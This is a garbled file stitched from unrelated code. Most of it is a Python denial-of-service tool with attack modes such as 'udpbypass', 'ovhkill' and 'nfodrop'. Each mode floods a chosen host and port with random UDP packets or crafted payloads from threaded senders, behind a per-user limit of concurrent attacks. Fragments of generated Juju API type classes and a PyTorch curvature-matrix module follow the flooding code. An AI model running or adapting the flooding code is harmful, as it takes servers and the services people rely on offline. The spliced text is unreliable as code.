time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udpbypass":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "http-stm":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "http-cld":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ddos-guard":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "Rename By Dhx ->Dhiyaflare":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "icmprape":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1024
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprapev3":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 10000
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfodrop":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhnat":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhamp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfocrush":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "greeth":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "telnet":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhkill":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhdown":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ssdp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "hydrakiller":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfonull":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killall":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x02\x00\x2f"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif | |
str
value : str
'''
address_ = Address.from_json(address) if address else None
port_ = port
scope_ = scope
space_id_ = space_id
space_name_ = space_name
type__ = type_
value_ = value
# Validate arguments against known Juju API types.
if address_ is not None and not isinstance(address_, (dict, Address)):
raise Exception("Expected address_ to be a Address, received: {}".format(type(address_)))
if port_ is not None and not isinstance(port_, int):
raise Exception("Expected port_ to be a int, received: {}".format(type(port_)))
if scope_ is not None and not isinstance(scope_, (bytes, str)):
raise Exception("Expected scope_ to be a str, received: {}".format(type(scope_)))
if space_id_ is not None and not isinstance(space_id_, (bytes, str)):
raise Exception("Expected space_id_ to be a str, received: {}".format(type(space_id_)))
if space_name_ is not None and not isinstance(space_name_, (bytes, str)):
raise Exception("Expected space_name_ to be a str, received: {}".format(type(space_name_)))
if type__ is not None and not isinstance(type__, (bytes, str)):
raise Exception("Expected type__ to be a str, received: {}".format(type(type__)))
if value_ is not None and not isinstance(value_, (bytes, str)):
raise Exception("Expected value_ to be a str, received: {}".format(type(value_)))
self.address = address_
self.port = port_
self.scope = scope_
self.space_id = space_id_
self.space_name = space_name_
self.type_ = type__
self.value = value_
self.unknown_fields = unknown_fields
class HostedModelConfig(Type):
_toSchema = {'cloud_spec': 'cloud-spec', 'config': 'config', 'error': 'error', 'name': 'name', 'owner': 'owner'}
_toPy = {'cloud-spec': 'cloud_spec', 'config': 'config', 'error': 'error', 'name': 'name', 'owner': 'owner'}
def __init__(self, cloud_spec=None, config=None, error=None, name=None, owner=None, **unknown_fields):
'''
cloud_spec : CloudSpec
config : typing.Mapping[str, typing.Any]
error : Error
name : str
owner : str
'''
cloud_spec_ = CloudSpec.from_json(cloud_spec) if cloud_spec else None
config_ = config
error_ = Error.from_json(error) if error else None
name_ = name
owner_ = owner
# Validate arguments against known Juju API types.
if cloud_spec_ is not None and not isinstance(cloud_spec_, (dict, CloudSpec)):
raise Exception("Expected cloud_spec_ to be a CloudSpec, received: {}".format(type(cloud_spec_)))
if config_ is not None and not isinstance(config_, dict):
raise Exception("Expected config_ to be a Mapping, received: {}".format(type(config_)))
if error_ is not None and not isinstance(error_, (dict, Error)):
raise Exception("Expected error_ to be a Error, received: {}".format(type(error_)))
if name_ is not None and not isinstance(name_, (bytes, str)):
raise Exception("Expected name_ to be a str, received: {}".format(type(name_)))
if owner_ is not None and not isinstance(owner_, (bytes, str)):
raise Exception("Expected owner_ to be a str, received: {}".format(type(owner_)))
self.cloud_spec = cloud_spec_
self.config = config_
self.error = error_
self.name = name_
self.owner = owner_
self.unknown_fields = unknown_fields
class HostedModelConfigsResults(Type):
_toSchema = {'models': 'models'}
_toPy = {'models': 'models'}
def __init__(self, models=None, **unknown_fields):
'''
models : typing.Sequence[~HostedModelConfig]
'''
models_ = [HostedModelConfig.from_json(o) for o in models or []]
# Validate arguments against known Juju API types.
if models_ is not None and not isinstance(models_, (bytes, str, list)):
raise Exception("Expected models_ to be a Sequence, received: {}".format(type(models_)))
self.models = models_
self.unknown_fields = unknown_fields
class ImageFilterParams(Type):
_toSchema = {'images': 'images'}
_toPy = {'images': 'images'}
def __init__(self, images=None, **unknown_fields):
'''
images : typing.Sequence[~ImageSpec]
'''
images_ = [ImageSpec.from_json(o) for o in images or []]
# Validate arguments against known Juju API types.
if images_ is not None and not isinstance(images_, (bytes, str, list)):
raise Exception("Expected images_ to be a Sequence, received: {}".format(type(images_)))
self.images = images_
self.unknown_fields = unknown_fields
class ImageMetadata(Type):
_toSchema = {'arch': 'arch', 'created': 'created', 'kind': 'kind', 'series': 'series', 'url': 'url'}
_toPy = {'arch': 'arch', 'created': 'created', 'kind': 'kind', 'series': 'series', 'url': 'url'}
def __init__(self, arch=None, created=None, kind=None, series=None, url=None, **unknown_fields):
'''
arch : str
created : str
kind : str
series : str
url : str
'''
arch_ = arch
created_ = created
kind_ = kind
series_ = series
url_ = url
# Validate arguments against known Juju API types.
if arch_ is not None and not isinstance(arch_, (bytes, str)):
raise Exception("Expected arch_ to be a str, received: {}".format(type(arch_)))
if created_ is not None and not isinstance(created_, (bytes, str)):
raise Exception("Expected created_ to be a str, received: {}".format(type(created_)))
if kind_ is not None and not isinstance(kind_, (bytes, str)):
raise Exception("Expected kind_ to be a str, received: {}".format(type(kind_)))
if series_ is not None and not isinstance(series_, (bytes, str)):
raise Exception("Expected series_ to be a str, received: {}".format(type(series_)))
if url_ is not None and not isinstance(url_, (bytes, str)):
raise Exception("Expected url_ to be a str, received: {}".format(type(url_)))
self.arch = arch_
self.created = created_
self.kind = kind_
self.series = series_
self.url = url_
self.unknown_fields = unknown_fields
class ImageMetadataFilter(Type):
_toSchema = {'arches': 'arches', 'region': 'region', 'root_storage_type': 'root-storage-type', 'series': 'series', 'stream': 'stream', 'virt_type': 'virt-type'}
_toPy = {'arches': 'arches', 'region': 'region', 'root-storage-type': 'root_storage_type', 'series': 'series', 'stream': 'stream', 'virt-type': 'virt_type'}
def __init__(self, arches=None, region=None, root_storage_type=None, series=None, stream=None, virt_type=None, **unknown_fields):
'''
arches : typing.Sequence[str]
region : str
root_storage_type : str
series : typing.Sequence[str]
stream : str
virt_type : str
'''
arches_ = arches
region_ = region
root_storage_type_ = root_storage_type
series_ = series
stream_ = stream
virt_type_ = virt_type
# Validate arguments against known Juju API types.
if arches_ is not None and not isinstance(arches_, (bytes, str, list)):
raise Exception("Expected arches_ to be a Sequence, received: {}".format(type(arches_)))
if region_ is not None and not isinstance(region_, (bytes, str)):
raise Exception("Expected region_ to be a str, received: {}".format(type(region_)))
if root_storage_type_ is not None and not isinstance(root_storage_type_, (bytes, str)):
raise Exception("Expected root_storage_type_ to be a str, received: {}".format(type(root_storage_type_)))
if series_ is not None and not isinstance(series_, (bytes, str, list)):
raise Exception("Expected series_ to be a Sequence, received: {}".format(type(series_)))
if stream_ is not None and not isinstance(stream_, (bytes, str)):
raise Exception("Expected stream_ to be a str, received: {}".format(type(stream_)))
if virt_type_ is not None and not isinstance(virt_type_, (bytes, str)):
raise Exception("Expected virt_type_ to be a str, received: {}".format(type(virt_type_)))
self.arches = arches_
self.region = region_
self.root_storage_type = root_storage_type_
self.series = series_
self.stream = stream_
self.virt_type = virt_type_
self.unknown_fields = unknown_fields
class ImageSpec(Type):
_toSchema = {'arch': 'arch', 'kind': 'kind', 'series': 'series'}
_toPy = {'arch': 'arch', 'kind': 'kind', 'series': 'series'}
def __init__(self, arch=None, kind=None, series=None, **unknown_fields):
'''
arch : str
kind : str
series : str
'''
arch_ = arch
kind_ = kind
series_ = series
# Validate arguments against known Juju API types.
if arch_ is not None and not isinstance(arch_, (bytes, str)):
raise Exception("Expected arch_ to be a str, received: {}".format(type(arch_)))
if kind_ is not None and not isinstance(kind_, (bytes, str)):
raise Exception("Expected kind_ to be a str, received: {}".format(type(kind_)))
if series_ is not None and not isinstance(series_, (bytes, str)):
raise Exception("Expected series_ to be a str, received: {}".format(type(series_)))
self.arch = arch_
self.kind = kind_
self.series = series_
self.unknown_fields = unknown_fields
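Every generated type above follows the same contract: keyword arguments are validated with loose `isinstance` checks, stored on the instance, and any unrecognized keys are preserved in `unknown_fields`. A standalone sketch of that pattern (the `_DemoSpec` class and its field are hypothetical, not part of the Juju schema):

```python
class _DemoSpec:
    """Hypothetical stand-in mirroring the generated Type subclasses above."""
    _toSchema = {'arch': 'arch'}
    _toPy = {'arch': 'arch'}

    def __init__(self, arch=None, **unknown_fields):
        # Same loose validation the generated code performs.
        if arch is not None and not isinstance(arch, (bytes, str)):
            raise Exception(
                "Expected arch to be a str, received: {}".format(type(arch)))
        self.arch = arch
        self.unknown_fields = unknown_fields

spec = _DemoSpec(arch='amd64', future_field='kept')
```

Keeping unknown keys around makes the generated bindings tolerant of fields added by newer API servers.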
class ImportStorageDetails(Type):
_toSchema = {'storage_tag': 'storage-tag'}
_toPy = {'storage-tag': 'storage_tag'}
def __init__(self, storage_tag=None, **unknown_fields):
'''
storage_tag : str
'''
storage_tag_ = storage_tag
# Validate arguments against known Juju API types.
if storage_tag_ is not None and not isinstance(storage_tag_, (bytes, str)):
raise Exception("Expected storage_tag_ to be a str, received: {}".format(type(storage_tag_)))
self.storage_tag = storage_tag_
self.unknown_fields = unknown_fields
class ImportStorageParams(Type):
_toSchema = {'kind': 'kind', 'pool': 'pool', 'provider_id': 'provider-id', 'storage_name': 'storage-name'}
_toPy = {'kind': 'kind', 'pool': 'pool', 'provider-id': 'provider_id', 'storage-name': 'storage_name'}
def __init__(self, kind=None, pool=None, provider_id=None, storage_name=None, **unknown_fields):
'''
kind : int
pool : str
provider_id : str
storage_name : str
'''
kind_ = kind
pool_ = pool
provider_id_ = provider_id
storage_name_ = storage_name
# Validate arguments against known Juju API types.
if kind_ is not None and not isinstance(kind_, int):
raise Exception("Expected kind_ to be a int, received: {}".format(type(kind_)))
if pool_ is not None and not isinstance(pool_, (bytes, str)):
raise Exception("Expected pool_ to be a str, received: {}".format(type(pool_)))
if provider_id_ is not None and not isinstance(provider_id_, (bytes, str)):
raise Exception("Expected provider_id_ to be a str, received: {}".format(type(provider_id_)))
if storage_name_ is not None and not isinstance(storage_name_, (bytes, str)):
raise Exception("Expected storage_name_ to be a str, received: {}".format(type(storage_name_)))
self.kind = kind_
self.pool = pool_
self.provider_id = provider_id_
self.storage_name = storage_name_
self.unknown_fields = unknown_fields
class ImportStorageResult(Type):
_toSchema = {'error': 'error', 'result': 'result'}
_toPy = {'error': 'error', 'result': 'result'}
def __init__(self, error=None, result=None, **unknown_fields):
'''
error : Error
result : ImportStorageDetails
'''
error_ = Error.from_json(error) if error else None
result_ = ImportStorageDetails.from_json(result) if | |
from contextlib import contextmanager
import numpy as np
import torch
import torch.nn.functional as F
from .core import extend
from .utils import disable_param_grad
from .gradient import data_loader_gradient
from .operations import *
from .symmatrix import SymMatrix, Kron, Diag, UnitWise
from .matrices import *
from .mvp import power_method, conjugate_gradient_method
_SHAPE_TO_OP = {
SHAPE_FULL: OP_BATCH_GRADS, # full
SHAPE_BLOCK_DIAG: OP_BATCH_GRADS, # block-diagonal
SHAPE_KRON: OP_COV_KRON, # Kronecker-factored
SHAPE_DIAG: OP_COV_DIAG, # diagonal
}
_COV_FULL = 'cov_full'
_CVP_FULL = 'cvp_full'
_COV_BLOCK_DIAG = 'cov_block_diag'
_CVP_BLOCK_DIAG = 'cvp_block_diag'
